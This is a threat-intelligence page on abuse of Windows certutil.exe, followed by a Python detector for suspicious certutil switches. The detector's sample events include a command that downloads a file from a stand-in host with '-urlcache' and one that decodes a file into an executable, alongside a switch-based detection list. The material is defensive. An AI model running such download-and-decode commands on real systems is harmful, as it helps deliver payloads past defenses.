57bc54e29ae449357549e23e9e9c1874328f841d731e4f02013d14cb487ec911
Author: Microsoft
Source: Wild
Threat: LOLBin
Summary
Certutil.exe is a utility used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
EchoTrail Prevalence Score (EPS)
33.84
Rank Analysis
Host Prevalence
34.7%
Execution Rank
64,644th
Behavioral Analysis
Top Filenames
Top Paths
C:\Windows\System32 (96.58 %)
Top Network Ports
443 (92.68 %)
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
Security Analysis
Intel
Certutil.exe is normally meant to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains, according to Microsoft. However, it has been abused by malware because it can download files and encode and decode them. Downloading through certutil can help to circumvent detections and defenses, and its encoding and decoding capabilities can serve the same purpose. Here is an example Sigma rule to help detect misuse of certutil.exe: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml
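The detection idea behind the referenced Sigma rule, as an added example that is not part of the EchoTrail page or of any Microsoft or SigmaHQ code: scan process-creation events for certutil.exe and flag the switches that correspond to the download, encode and decode behaviours described above. The key=value event format, the host names and the command lines below are constructed for illustration; the switch names are certutil's own.

```python
"""Flag suspicious certutil.exe invocations in process-creation events.

Added example, not from EchoTrail, Microsoft or SigmaHQ. It mirrors the
approach of the win_susp_certutil_command Sigma rule linked above: match on
the certutil switches used for downloading and for encoding/decoding files.
The log format and the sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Switches that are rare in legitimate administration but common in abuse,
# mapped to the behaviour they imply. certutil accepts both "-" and "/" as
# the switch prefix, so the regex below matches either.
SUSPICIOUS_SWITCHES = {
    "urlcache": "download",
    "verifyctl": "download",
    "encode": "encode",
    "decode": "decode",
    "decodehex": "decode",
}
_SWITCH_RE = re.compile(r"(?:^|\s)[-/](\w+)")


@dataclass
class Finding:
    host: str
    pid: int
    behaviours: tuple   # e.g. ("download",)
    command_line: str


def parse_event(line: str) -> dict:
    """Parse one constructed 'key=value' line into a dict.

    Values may be double-quoted (CommandLine and Image usually are); the
    quotes are stripped and the inner text is kept verbatim.
    """
    fields = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|(\S+))', line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def classify_certutil(command_line: str) -> tuple:
    """Return the sorted tuple of suspicious behaviours implied by the switches.

    Only whitespace-preceded switches count, so a '/' inside a URL such as
    http://host/path is not mistaken for a switch prefix.
    """
    found = set()
    for m in _SWITCH_RE.finditer(command_line):
        behaviour = SUSPICIOUS_SWITCHES.get(m.group(1).lower())
        if behaviour:
            found.add(behaviour)
    return tuple(sorted(found))


def detect(lines) -> list:
    """Run the certutil check over an iterable of event lines."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        # Match on the image path, not the command line, so a renamed copy of
        # another binary echoing "-decode" (last sample event) is not flagged.
        if not ev.get("Image", "").lower().endswith("\\certutil.exe"):
            continue
        behaviours = classify_certutil(ev.get("CommandLine", ""))
        if behaviours:
            findings.append(Finding(
                host=ev.get("Host", ""),
                pid=int(ev.get("ProcessId", 0)),
                behaviours=behaviours,
                command_line=ev.get("CommandLine", ""),
            ))
    return findings


# Constructed sample events: one benign use, one download, one decode, and a
# non-certutil process whose command line merely contains the word "-decode".
SAMPLE_EVENTS = [
    'Host=ws01 ProcessId=4120 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil.exe -dump"',
    'Host=ws01 ProcessId=4388 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil -urlcache -split -f http://example.invalid/p.txt C:\\Users\\Public\\p.txt"',
    'Host=ws02 ProcessId=5012 Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil /decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.exe"',
    'Host=ws02 ProcessId=5100 Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c echo -decode"',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host} pid={f.pid} {','.join(f.behaviours)}: {f.command_line}")
```

The image-path check matters in practice: the Sigma rule keys on the certutil binary plus its switches, and matching on command-line text alone would produce noise from any process that happens to mention those words. The prevalence figures on this page (certutil almost always runs from C:\Windows\System32 and talks to port 443) are a useful second filter when tuning this into an alert.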